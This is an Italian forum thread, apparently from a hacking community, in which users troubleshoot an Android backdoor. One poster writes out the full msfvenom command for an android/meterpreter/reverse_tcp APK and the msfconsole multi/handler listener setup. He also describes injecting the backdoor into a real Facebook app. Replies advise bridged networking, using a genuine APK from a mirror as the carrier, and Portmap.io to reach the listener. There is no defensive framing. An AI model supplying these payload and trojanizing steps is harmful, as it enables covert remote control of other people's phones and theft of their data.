Discussione Malware problemi con MainActivity APK Payload..

[0xbro]

scusa, ti puoi spiegare meglio? per avere un ip locale valido bisogna farlo a mano dal router? come D;

No, ma probabilmente hai la macchina virtuale sotto NAT e non direttamente collegata al router. Ciò vuol dire che il cellulare collegato direttamente al router avrà un indirizzo del tipo 192.168.x.x mentre la tua macchina virtuale sembra avere 10.0.2.15, quindi sembra essere su un'altra rete

 

[JunkCoder]

Le reti domestiche di solito non usano il range piu' grande 10.x.x.x sei sicuro che sia l'IP locale corretto? Dovresti averlo configurato a mano nel router a meno che non ne hai uno enterprise.

 

[0xbro]

inizialmente avevo messo un proxy su kali, ho provato a riavviare la scheda di rete e a fare

service network restart

ma l'ip locale rimane sempre quello..soluzioni?

Se la macchina è in NAT devi cambiare le impostazioni della VM e metterla in bridge

 

[Domoho]

buongiorno, è da almeno 2 giorni che sto provando a creare una backdoor sottoforma di apk, anzi, in realtà ci son riuscito a crearla, e anche a spostarla sul telefono..il problema è che quando avvio l'exploit, anche se apro l'app dal telefono, non succede nulla..ora vi lascio i comandi qui sotto (kali linux 2020.4)
------------------------
per creare il payload:
---

msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip locale) LPORT=4444 R> /var/www/html/provabackdoor.apk

---
una volta spostato dal pc al telefono installo l'apk, è un main activity, nel frattempo mi connetto su metasploit con questi comandi:
---

msfconsole
msf> use multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf>set LHOST (ip locale)
msf> set LPORT 4444
msf> exploit
[*] Started reverse TCP handler on 10.0.2.15:4444

----
dopodichè apro l'apk infettato da telefono, ma indovinate? non succede assolutamente nulla, nessuna animazione che si apre, nessun segnale su metasploit, ora non so se il problema è il mio telefono con antivirus, o la backdoor e la connessione ad essa..
inoltre ho provato anche ad infettare un apk normalissimo di facebook con una backdoor creata, il risultato in questione era sbarrato con una "X", non potevo ne drag n dropparlo sul desktop, nè spostarlo su kali linux stesso..
qualcuno mi aiuti D:

 

[Helplease]

Sei sicuro che il telefono e il computer fossero connessi alla stessa rete WiFi?

 

[Domoho]

Le reti domestiche di solito non usano il range piu' grande 10.x.x.x sei sicuro che sia l'IP locale corretto? Dovresti averlo configurato a mano nel router a meno che non ne hai uno enterprise.

scusa, ti puoi spiegare meglio? per avere un ip locale valido bisogna farlo a mano dal router? come D;

 

[WW313NET]

Che apk stai usando? non fare touch malevolo.apk usa un apk gia esistente, scaricalo da apk mirror

 

[Domoho]

No, ma probabilmente hai la macchina virtuale sotto NAT e non direttamente collegata al router. Ciò vuol dire che il cellulare collegato direttamente al router avrà un indirizzo del tipo 192.168.x.x mentre la tua macchina virtuale sembra avere 10.0.2.15, quindi sembra essere su un'altra rete

inizialmente avevo messo un proxy su kali, ho provato a riavviare la scheda di rete e a fare

service network restart

ma l'ip locale rimane sempre quello..soluzioni?

Messaggio unito automaticamente: 16 Gennaio 2021

Che apk stai usando? non fare touch malevolo.apk usa un apk gia esistente, scaricalo da apk mirror

era un apk di facebook già esistente, però non potevo eseguirlo o spostarlo dalla sua cartella

 

[SangueAzzurro01]

scusate ho un problema con metasploit
vi spiego: creo il payload corretto per android, lo condivido con telefono android lo scarico abilito tutto ma non si apre e non si collega con metasploit. l'ip che ho usato è quello trovato con ifconfig

 

[Netcat]

Hai 2 soluzioni:
1. Quello sembra decisamente un Indirizzo IP di tipo NAT (sei su virtualbox caro?), in questo caso vai sulla tendina di VirtualBox e passa a Bridged Adapter;
2. Portmap.io